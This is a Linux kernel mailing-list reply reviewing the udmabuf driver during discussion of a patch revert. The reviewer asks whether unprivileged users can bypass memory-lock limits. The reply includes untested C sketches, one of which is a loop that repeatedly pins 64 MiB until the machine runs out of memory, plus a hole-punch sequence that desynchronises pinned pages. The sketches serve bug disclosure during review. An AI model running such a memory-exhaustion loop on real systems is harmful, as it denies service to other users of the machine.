Message-ID: <281caf4f-25da-3a73-554b-4fb252963035@redhat.com>
Date: Mon, 12 Jun 2023 09:46:22 +0200
From: David Hildenbrand <david@...hat.com>
To: "Kasireddy, Vivek" <vivek.kasireddy@...el.com>,
Mike Kravetz <mike.kravetz@...cle.com>,
"linux-kernel@...r.kernel.org" <linux-kernel@...r.kernel.org>,
"linux-mm@...ck.org" <linux-mm@...ck.org>,
"dri-devel@...ts.freedesktop.org" <dri-devel@...ts.freedesktop.org>,
"qemu-devel@...gnu.org" <qemu-devel@...gnu.org>,
Hugh Dickins <hughd@...gle.com>
Cc: Gerd Hoffmann <kraxel@...hat.com>,
"Kim, Dongwon" <dongwon.kim@...el.com>,
"Chang, Junxiao" <junxiao.chang@...el.com>,
"kirill.shutemov@...ux.intel.com" <kirill.shutemov@...ux.intel.com>,
"Hocko, Michal" <mhocko@...e.com>,
"jmarchan@...hat.com" <jmarchan@...hat.com>,
"muchun.song@...ux.dev" <muchun.song@...ux.dev>,
James Houghton <jthoughton@...gle.com>,
Greg Kroah-Hartman <gregkh@...uxfoundation.org>,
Andrew Morton <akpm@...ux-foundation.org>,
"stable@...r.kernel.org" <stable@...r.kernel.org>
Subject: Re: [PATCH] udmabuf: revert 'Add support for mapping hugepages (v4)'
On 12.06.23 09:10, Kasireddy, Vivek wrote:
> Hi Mike,
Hi Vivek,
>
> Sorry for the late reply; I just got back from vacation.
> If it is unsafe to directly use the subpages of a hugetlb page, then reverting
> this patch seems like the only option for addressing this issue immediately.
> So, this patch is
> Acked-by: Vivek Kasireddy <vivek.kasireddy@...el.com>
>
> As far as the use-case is concerned, there are two main users of the udmabuf
> driver: Qemu and CrosVM VMMs. However, it appears Qemu is the only one
> that uses hugetlb pages (when hugetlb=on is set) as the backing store for
> Guest (Linux, Android and Windows) system memory. The main goal is to
> share the pages associated with the Guest allocated framebuffer (FB) with
> the Host GPU driver and other components in a zero-copy way. To that end,
> the guest GPU driver (virtio-gpu) allocates 4k size pages (associated with
> the FB) and pins them before sharing the (guest) physical (or dma) addresses
> (and lengths) with Qemu. Qemu then translates the addresses into file
> offsets and shares these offsets with udmabuf.
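(Side note for anyone not familiar with the interface: IIUC that last
step boils down to the UDMABUF_CREATE ioctl from
include/uapi/linux/udmabuf.h. A rough, untested sketch of the flow --
the offset/size values here are made up:)

    #define _GNU_SOURCE
    #include <fcntl.h>
    #include <unistd.h>
    #include <sys/ioctl.h>
    #include <sys/mman.h>
    #include <linux/udmabuf.h>

    int main(void)
    {
        /* memfd backing guest RAM; udmabuf insists on F_SEAL_SHRINK */
        int memfd = memfd_create("guest-ram", MFD_ALLOW_SEALING);
        ftruncate(memfd, 64 << 20);
        fcntl(memfd, F_ADD_SEALS, F_SEAL_SHRINK);

        /* QEMU would compute offset/size from the guest FB pages */
        struct udmabuf_create create = {
            .memfd  = memfd,
            .flags  = UDMABUF_FLAGS_CLOEXEC,
            .offset = 0,            /* made-up FB file offset */
            .size   = 4 << 20,      /* made-up FB size */
        };

        int devfd = open("/dev/udmabuf", O_RDWR);
        /* on success we get back a dma-buf fd covering these pages */
        int buffd = ioctl(devfd, UDMABUF_CREATE, &create);
        return buffd < 0;
    }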
Is my understanding correct that we can effectively long-term pin
(worse than mlock) 64 MiB per UDMABUF_CREATE, eventually allowing
!root users

ll /dev/udmabuf
crw-rw---- 1 root kvm 10, 125 12. Jun 08:12 /dev/udmabuf

to bypass their effective MEMLOCK limit, fragmenting physical memory
and breaking swap?
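That is, nothing seems to stop such a user from doing something like
this in a loop until the machine runs out of memory, completely
ignoring RLIMIT_MEMLOCK (hypothetical, untested sketch, reusing the
includes from above):

    int devfd = open("/dev/udmabuf", O_RDWR);

    for (;;) {
        int memfd = memfd_create("x", MFD_ALLOW_SEALING);

        ftruncate(memfd, 64 << 20);
        fcntl(memfd, F_ADD_SEALS, F_SEAL_SHRINK);

        struct udmabuf_create create = {
            .memfd = memfd, .offset = 0, .size = 64 << 20,
        };
        /* each call makes the kernel grab references on another
           64 MiB worth of shmem pages, unreclaimable until the
           dma-buf fd goes away */
        ioctl(devfd, UDMABUF_CREATE, &create);
        close(memfd);   /* pages stay referenced via the dma-buf */
    }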
Regarding udmabuf_vm_fault(): I assume we're mapping pages we
obtained from the memfd ourselves into a special VMA (the mmap() of
the udmabuf). I'm not sure how well shmem pages are prepared for
being mapped by someone else into an arbitrary VMA (page->index?).
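For reference, the fault handler in drivers/dma-buf/udmabuf.c is
essentially the following (paraphrased from memory, so don't quote me
on the details):

    static vm_fault_t udmabuf_vm_fault(struct vm_fault *vmf)
    {
        struct vm_area_struct *vma = vmf->vma;
        struct udmabuf *ubuf = vma->vm_private_data;

        if (vmf->pgoff >= ubuf->pagecount)
            return VM_FAULT_SIGBUS;

        /* hand out the shmem page we grabbed at create time */
        vmf->page = ubuf->pages[vmf->pgoff];
        get_page(vmf->page);
        return 0;
    }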
... also, just imagine someone doing FALLOC_FL_PUNCH_HOLE / ftruncate()
on the memfd. What's mapped into the memfd no longer corresponds to
what's pinned / mapped into the VMA.
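Something like the following (untested sketch, continuing the first
example above) should already trigger that disconnect, because
udmabuf refuses memfds with F_SEAL_WRITE, and F_SEAL_SHRINK doesn't
stop hole punching:

    #include <linux/falloc.h>

    /* drop all pages in the FB range from the memfd */
    fallocate(memfd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE,
              0, 4 << 20);

    /* The next access through the memfd allocates fresh shmem
       pages, while the dma-buf (and anything that mmap()ed the
       udmabuf) still references the old, now-disconnected pages. */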
Was linux-mm (and especially shmem maintainers, ccing Hugh) involved in
the upstreaming of udmabuf?
--
Cheers,
David / dhildenb